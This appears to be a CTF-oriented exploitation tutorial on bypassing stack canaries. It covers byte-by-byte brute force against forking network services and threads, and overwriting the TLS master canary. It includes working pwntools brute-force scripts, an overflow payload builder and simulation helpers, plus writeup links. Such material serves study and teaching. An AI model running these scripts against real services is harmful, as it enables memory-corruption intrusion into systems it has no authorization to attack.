BF Forked & Threaded Stack Canaries
If you are facing a binary protected by a canary and PIE (Position Independent Executable), you probably need to find a way to bypass both.
[!NOTE] Note that checksec might not detect that a binary is protected by a canary if the binary was statically compiled and checksec is unable to identify the function that performs the check. However, you can spot the canary manually: look for a value that is saved on the stack at the beginning of a function and checked again before the function returns.
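The manual check described above can be partly automated. The following is a minimal sketch, assuming a 64-bit Linux/glibc target, where the canary is read from fs:0x28 and compilers commonly emit `mov rax, QWORD PTR fs:0x28` in the function prologue. The helper name `find_canary_loads` is hypothetical. A compiler may load the canary into a different register, and 32-bit binaries use gs:0x14 instead, so finding no hits does not prove that the binary has no canary.

```python
# Byte encoding of `mov rax, QWORD PTR fs:0x28` on x86-64.
# Assumption: the compiler used rax; other registers produce other encodings.
CANARY_LOAD_RAX = bytes.fromhex("64488b042528000000")


def find_canary_loads(code, pattern=CANARY_LOAD_RAX):
    """Return every offset in `code` where the canary-load pattern starts."""
    offsets = []
    pos = code.find(pattern)
    while pos != -1:
        offsets.append(pos)
        pos = code.find(pattern, pos + 1)
    return offsets


if __name__ == "__main__":
    import sys

    # Usage: python scan.py ./binary
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as f:
            hits = find_canary_loads(f.read())
        print(f"{len(hits)} candidate canary loads found")
```

Each hit is only a candidate: confirm in a disassembler that the loaded value is stored on the stack and compared again before the function returns.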
Brute force Canary
The easiest canary to bypass is one in a network service that forks a child process for every new connection. Because fork copies the parent's memory, every child reuses the same canary, so each new connection is a fresh attempt against the same value.
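The inheritance behaviour can be illustrated with a small POSIX-only sketch. It does not read a real stack canary: the random `secret` is a stand-in chosen once in the parent, and the function name `secrets_seen_by_children` is hypothetical. The point is only that each forked child sees the value the parent already had, whereas a freshly executed program would get a new one.

```python
import os


def secrets_seen_by_children(n_children=3):
    """Fork n children and collect the secret each one inherited."""
    secret = os.urandom(8)  # stand-in for the canary, generated once in the parent
    seen = []
    for _ in range(n_children):
        read_fd, write_fd = os.pipe()
        pid = os.fork()
        if pid == 0:
            # Child: report the inherited value and exit immediately
            os.close(read_fd)
            os.write(write_fd, secret)
            os._exit(0)
        # Parent: read what the child saw, then reap it
        os.close(write_fd)
        seen.append(os.read(read_fd, 8))
        os.close(read_fd)
        os.waitpid(pid, 0)
    return secret, seen


if __name__ == "__main__":
    secret, seen = secrets_seen_by_children()
    print(all(value == secret for value in seen))
```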
In that setting, the canary can be brute-forced byte by byte: a guessed byte is correct if the program continues its regular flow and wrong if the program crashes. In this example the function brute-forces an 8-byte canary (x64) and distinguishes a correct guess from a wrong one by checking whether the server sends a response back (in other situations a try/except could be used instead):
Example 1
This example is implemented for 64 bits but could easily be adapted to 32 bits.
from pwn import *

def connect():
    # Open a new connection; the forking server handles each one in a fresh child
    return remote("localhost", 8788)

def get_bf(base):
    canary = b""
    while len(canary) < 8:
        # Try every possible value (0x00-0xff) for the next canary byte
        for guess in range(0x100):
            r = connect()
            r.recvuntil(b"Username: ")
            r.send(base + bytes([guess]))
            # The expected output only arrives if the child did not crash
            alive = b"SOME OUTPUT" in r.clean()
            r.close()
            if alive:
                print("Guessed correct byte:", format(guess, "02x"))
                canary += bytes([guess])
                base += bytes([guess])
                break
        else:
            raise RuntimeError("No valid byte found; check the offset and the oracle")
    print("FOUND: " + "".join("\\x{:02x}".format(c) for c in canary))
    return base

canary_offset = 1176
base = b"A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base)  # Junk data + canary
CANARY = u64(base_canary[len(base_canary) - 8:])  # Get the canary
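The same byte-by-byte logic can be tested offline, without a target. The sketch below is a simulation under stated assumptions: `make_oracle` is a hypothetical stand-in for the forking service that reports "alive" only when every overwritten canary byte matches, and the 16-byte offset is arbitrary. It also shows why the attack is practical: at most 8 × 256 = 2048 connections are needed, instead of up to 2^64 guesses for the whole value at once.

```python
import os


def make_oracle(canary, offset):
    """Simulate one connection to a forking service with a fixed canary."""
    def oracle(payload):
        # Bytes written past `offset` overwrite the canary from its first byte on
        overwritten = payload[offset:offset + len(canary)]
        # The child survives only if every overwritten byte matches the canary
        return canary.startswith(overwritten)
    return oracle


def brute_force(oracle, offset, size=8):
    """Recover `size` canary bytes one at a time; return (canary, attempts)."""
    known = b""
    attempts = 0
    while len(known) < size:
        for guess in range(0x100):
            attempts += 1
            if oracle(b"A" * offset + known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("oracle rejected every value")
    return known, attempts


if __name__ == "__main__":
    # glibc canaries start with a null byte, so the first guess usually succeeds
    secret = b"\x00" + os.urandom(7)
    found, attempts = brute_force(make_oracle(secret, 16), 16)
    print(found.hex(), attempts)
```

Against a real service, the oracle would wrap the connect/send/check steps from Example 1.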
Example 2
This is implemented for 32 bits, but it could easily be changed to 64 bits. Also note that in this example the program first expects a byte indicating the size of the input, followed by the payload.
from pwn import *

# Brute-force the 4-byte canary one byte at a time
def breakCanary():
    known_canary = b""
    len_bytes_to_read = 0x21
    for j in range(0, 4):
        # Try all 0x100 possible values for the current byte
        for test_canary in range(0x100):
            print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

            # Send the current input size
            target.send(len_bytes_to_read.to_bytes(1, "little"))

            # Send this iteration's canary guess
            target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

            # Read the output and determine whether the guess was correct
            output = target.recvuntil(b"exit.")
            if b"YUM" in output:
                # Correct value: record it, grow the input size, and move on to the next byte
                print(" - next byte is: " + hex(test_canary))
                known_canary = known_canary + test_canary.to_bytes(1, "little")
                len_bytes_to_read += 1
                break

    # Return the canary
    return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
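Once the canary is known, it has to be written back unchanged in the final overflow so that the check still passes. The sketch below shows one way to frame such a payload for a service that, as in this example, expects a size byte followed by the data. The helper `build_overflow`, the 12-byte `gap` between the canary and the saved return address, and the address used in the demo are hypothetical; the real layout has to be measured in a debugger for each binary.

```python
import struct


def build_overflow(canary, ret_addr, buf_len=0x20, gap=12):
    """Build size byte + padding + canary + filler + 32-bit return address.

    `gap` is an assumed distance between the canary and the return address.
    """
    body = (
        b"0" * buf_len                  # fill the buffer up to the canary
        + canary                        # restore the canary so the check passes
        + b"1" * gap                    # filler up to the saved return address
        + struct.pack("<I", ret_addr)   # little-endian 32-bit return address
    )
    if len(body) > 0xFF:
        raise ValueError("payload does not fit in a one-byte length prefix")
    return bytes([len(body)]) + body


if __name__ == "__main__":
    # Placeholder canary and address, for illustration only
    print(build_overflow(b"\x00\xaa\xbb\xcc", 0x08049000).hex())
```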
Threads
Threads of the same process also share the same canary token, so it is possible to brute-force a canary if the binary spawns a new thread every time an attack attempt is made.
Moreover, a buffer overflow in a threaded function protected with a canary can be used to modify the master canary stored in the TLS. This is because it might be possible to reach the memory where the TLS (and therefore the canary) is stored via a buffer overflow in the thread's stack. As a result, the mitigation is useless because the check compares two canaries that are identical (although both modified). This attack is performed in the writeup: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads
Also check the presentation at https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015, which mentions that the TLS is usually allocated by mmap and that a thread's stack is also allocated by mmap, which might allow the overflow shown in the previous writeup.
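The reason the check still passes after such an overflow can be shown with a toy memory model. This is a simplified sketch, not a reproduction of the writeup's exploit: the class `ThreadMemoryModel`, the buffer size, and the distance between the stack canary and the TLS master copy are all hypothetical, and real offsets depend on the libc version and the thread stack size.

```python
import os

CANARY_SIZE = 8


class ThreadMemoryModel:
    """Toy layout: [buffer][stack canary][gap][master canary in TLS]."""

    def __init__(self, buf_len=32, gap_to_tls=64):
        self.buf_len = buf_len
        self.stack_off = buf_len
        self.master_off = buf_len + CANARY_SIZE + gap_to_tls
        self.mem = bytearray(self.master_off + CANARY_SIZE)
        master = b"\x00" + os.urandom(CANARY_SIZE - 1)
        # The master copy lives in the TLS; the prologue copies it to the stack
        self.mem[self.master_off:self.master_off + CANARY_SIZE] = master
        self.mem[self.stack_off:self.stack_off + CANARY_SIZE] = master

    def overflow(self, data):
        """Unbounded copy into the buffer (clamped to the modelled memory)."""
        n = min(len(data), len(self.mem))
        self.mem[:n] = data[:n]

    def check_passes(self):
        """Epilogue check: the stack copy must equal the TLS master copy."""
        stack = self.mem[self.stack_off:self.stack_off + CANARY_SIZE]
        master = self.mem[self.master_off:self.master_off + CANARY_SIZE]
        return stack == master


if __name__ == "__main__":
    short = ThreadMemoryModel()
    short.overflow(b"A" * (short.buf_len + CANARY_SIZE))
    print("overflow stops at stack canary:", short.check_passes())

    full = ThreadMemoryModel()
    full.overflow(b"A" * len(full.mem))
    print("overflow reaches TLS master:", full.check_passes())
```

In the model, an overflow that stops at the stack canary is detected, while one long enough to also overwrite the master copy with the same bytes is not.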
Other examples & references
- https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call execve and jump there.